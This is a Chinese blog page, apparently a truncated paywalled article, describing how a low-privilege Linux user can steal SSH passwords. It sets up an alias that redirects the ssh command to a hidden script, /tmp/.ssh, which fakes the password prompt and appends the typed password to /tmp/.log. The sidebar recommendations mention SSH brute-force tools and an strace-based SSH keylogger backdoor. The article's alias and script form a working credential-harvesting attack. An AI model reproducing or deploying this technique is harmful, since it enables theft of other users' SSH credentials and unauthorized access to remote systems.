linux 记录ssh密码,Linux下低权限用户记录SSH的密码

最新推荐文章于 2023-03-28 15:10:22 发布
VIP文章 最新推荐文章于 2023-03-28 15:10:22 发布
阅读量639 收藏 1
点赞数
文章标签: linux 记录ssh密码

实现思路

当用户执行 ssh user@remotehost 时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。

具体步骤

首先使用 alias 命令创建一个别名

这样当用户执行ssh时,执行的是指定的脚本

alias ssh="/tmp/.ssh"

当设置完别名后,仍可使用 /usr/bin/ssh 进行正常的SSH连接

测试一下

a1ed3a813a7d785fb46ecc4828d060cf.png

接下来观察正常的SSH连接会回显什么内容

f9df71c7143bf103e867d44aa1f3566b.png

那修改Shell脚本的回显,伪装成正常的SSH连接

#!/bin/bash

echo -e "${1}'s password: \c" #不换行输出

read -s pass #读取用户输入的内容,并赋值给变量pass

echo $pass >> /tmp/.log #将pass的内容输出到/tmp/.log中

再测试一下

最低0.47元/天 解锁文章
德中
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux下实现免密码登录(超详细)
01-11
1.Linux下生成密钥   ssh-keygen的命令手册,通过”man ssh-keygen“命令:   通过命令”ssh-keygen -t rsa“   生成之后会在用户的根目录生成一个 “.ssh”的文件夹   进入“.ssh”会生成以下几个文件   authorized_keys:存放远程免密登录的公钥,主要通过这个文件记录多台机器的公钥   id_rsa : 生成的私钥文件   id_rsa.pub : 生成的公钥文件   know_hosts : 已知的主机公钥清单     如果希望ssh公钥生效需满足至少下面两个条件:       1) .ssh目录的权限必须是
密码破解:SSH
w1304099880的博客
12-13 3436
密码破解:SSH 在本文中,我们将学习如何通过SSH端口来控制受害者的PC。我们可以通过多种方式破解SSH端口的密码。让我们花一些时间来学习所有这些内容,因为有时不同的情况需要采取不同的措施。 包含的内容: Hydra(九头蛇) Medusa(美杜莎) X-Hydra(九头蛇) Metasploit Patator Ncrack 让我们开始密码破解吧! Hydra Hydra是并行的登录破解程序,它支持多种攻击协议。这是一种非常快速,灵活的方法,易于在攻击中添加新模块。该工具使研究...
linux shell ssh密码,shell 密码输入不显示,Shell输出内容不显示密码,Shell实现有密码自动登录sshpass 应用实践...
weixin_42299244的博客
04-30 710
在很多实践项目中,我们经常会通过SSH来进行认证,如通过SSH拷贝文件,虽然我们可以使用公钥与私钥实现ssh密码登录,在不同的服务器上又需要配对相应的密钥,切换用户麻烦等问题,在一些需要交互但会涉及到批量处理的时候,通过shell 密码输入不显示,Shell输出内容不显示密码,Shell实现有密码自动登录会大大的提高工作效率#!/bin/bash#######################...
linux ssh密码记录,Linux记录-ssh批量双向无密码登录
weixin_34170139的博客
05-01 164
1批量ssh密码登录#!/bin/bashset -euser=rootpassword=xxxssh_port=22iplist=(10.0.0.1 10.0.0.2 10.0.0.3)cat >> /etc/sudoers.d/app << EOFapp ALL=(ALL) ALLapp ALL=(ALL) NOPASSWD: ALLDefaults !env_res...
Linux SSH密码暴力破解技术及攻防实战
Peter 的博客
01-22 6057
对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和加粗样式其他网络服务提供安全性的协议。 利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适...
使用ssh-keygen设置ssh密码登录
weixin_34026484的博客
03-25 247
也知道这个东西,大家都会,就当是谁忘了的时候,做个提醒的吧。。。 ssh 是一个专为远程登录会话和其他网络服务提供安全性的协议。默认状态下ssh链接是需要密码认证的,可以通过添加系统认证(即公钥-私钥)的修改,修改后系统间切换可以避免密码输入和ssh认证。以下将创建过程简单介绍下。 一、用ssh-keygen创建公钥 haif...
linux ssh保存密码,linux下使用sshpass实现ssh记住密码
weixin_30877689的博客
04-29 803
我们在通过ssh登录服务器时,常常需要输入密码,一定很麻烦,有一个好用的工具可以解决这个问题。话不多说,下面开始介绍下如何使用。1.编译安装wget http://sourceforge.net/projects/sshpass/files/sshpass/1.05/sshpass-1.05.tar.gztar xvzf sshpass-1.05.tar.gz./configure --prefi...
操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-28 853
当前系统如果存在strace的话,它可以跟踪任何进程的系统调用和数据,可以利用 strace 系统调试工具获取 ssh 的读写连接的数据,以达到抓取管理员登陆其他机器的明文密码的作用。这条命令的意思就是:首先alias是取一个叫ssh的别名,然后将登陆的密码日志就通过strace这个工具记录到tmp这个目录下并且以.sshpwd加上当前的日期时间为文件名的文件中。所以当我们执行ssh通过root去连接的时候,或者切换用户的时候,就会将密码记录到/tmp目录下的.sshpwd加上日期时间的日志里。
linux 监视ssh登录输出,适用于LinuxSSH“登录监视器”
weixin_39678451的博客
05-12 145
保罗汤布林有正确的建议。设置日志记录在你的sshd_config指向一个syslog工具,你可以分别登录:=>见人3系统日志的更多的设施。选择一个像例如# LoggingSyslogFacility local5LogLevel INFO然后设置你的syslog.conf这样的:local5.info |/var/run/mysshwatcher.pipe添加你要写入/ etc/initta...
应急响应入门之Linux分析排查
kali_Ma的博客
11-25 3997
前言: 当企业发生黑客入侵、系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失。 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些 Linux 服务器入侵排查的思路。 01文件分析-敏感文件信息 在linux系统下一切都是文件,其中/tmp是一个特别的临时目录文件。每个用户都可以对它进行读写操作。因此一个普通用户可以
LinuxSSH密码登录配置详解
01-10
假设有 A、 B 两台 Linux 服务器,我们希望能够从其中一台服务器通过 SSH密码登录到另一台服务器。 两台服务器的信息如下:  主机名 IP地址 免密码登录用户名 server1 192.168.12.11 guest1 server2 192...
设置ssh密码登录linux服务器的方法
01-10
每次登录测试服务器,ssh登录总是需要输入密码。登录的少还行,登录的多了,多一行命令都是...生成位置在/root/.ssh/文件夹下(我用的是root用户所以在root下,生成过程会有提示文件位置) .ssh 是隐藏文件夹 使用 l
Linux配置远程SSH密码登录
01-20
本文实例为大家分享了jaLinux配置远程SSH密码...ssh-copy-id也会给远程主机的用户主目录(/home)和/root/.ssh和/root/.ssh/authorized_key设置合适的权限 1)创建公钥和密钥 [root@test ~]# ssh-keygen -t rsa
linux远程登录ssh密码配置方法
01-10
公司刚上几台Linux,现在要把主机之间都能远程ssh密码登陆。 二、原理 很简单,使用ssh-keygen 在主机A上生成private和public密钥,将生成的public密钥拷贝到远程机器主机B上后,就可以使用ssh命令无需密码登录到...
非root权限下配置linux hadoop集群自动SSH记录
10-22
linux hadoop集群简单几步完成SSH配置。 不可思议。真的很简单。
后端开发是一个涉及广泛技术和工具的领域.docx
最新发布
04-30
后端开发是一个涉及广泛技术和工具的领域,这些资源对于构建健壮、可扩展和高效的Web应用程序至关重要。以下是对后端开发资源的简要介绍: 首先,掌握一门或多门编程语言是后端开发的基础。Java、Python和Node.js是其中最受欢迎的几种。Java以其跨平台性和丰富的库而著名,Python则因其简洁的语法和广泛的应用领域而备受欢迎。Node.js则通过其基于JavaScript的单线程异步I/O模型,为Web开发提供了高性能的解决方案。 其次,数据库技术是后端开发中不可或缺的一部分。关系型数据库(如MySQL、PostgreSQL)和非关系型数据库(如MongoDB、Redis)各有其特点和应用场景。关系型数据库适合存储结构化数据,而非关系型数据库则更适合处理大量非结构化数据。 此外,Web开发框架也是后端开发的重要资源。例如,Express是一个基于Node.js的Web应用开发框架,它提供了丰富的API和中间件支持,使得开发人员能够快速地构建Web应用程序。Django则是一个用Python编写的Web应用框架,它采用了MVC的软件设计模式,使得代码结构更加清晰和易于维护。
华为数字化转型实践28个精华问答glkm.pptx
04-30
华为数字化转型实践28个精华问答glkm.pptx
新员工入职培训全流程资料包gl.zip
04-30
新员工入职培训全流程资料包(100+个文件) 1入职流程指引 万科新职员入职通知书 万科新职员入职引导手册 新进员工跟进管理表 新员工入职报到工作单(文职) 新员工入职报到流程 新员工入职流程表 新员工入职手续办理流程(工厂 新员工入职手续清单 新员工入职须知 新员工入职训流程 新员工入职引导表(导师用) 2 入职工具表格 3 培训方案计划 4培训管理流程 5培训教材课件 6 培训效果检测 7 员工管理制度 8 劳动合同协议 9 新员工培训PPT模板(28套)
三菱PLC通讯程序实例
04-30
FX5U PLC作为主、从站的通讯方式程序实例,以及包含详细说明文件...
linux修改ssh密码
06-08
为了修改 Linux 系统中 ssh密码,您可以按照以下步骤操作: 1. 使用 SSH 客户端连接到您的 Linux 服务器。 2. 登录到系统以后,使用 root 用户或其他拥有管理员权限用户。 3. 运行以下命令来修改 ssh 密码:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值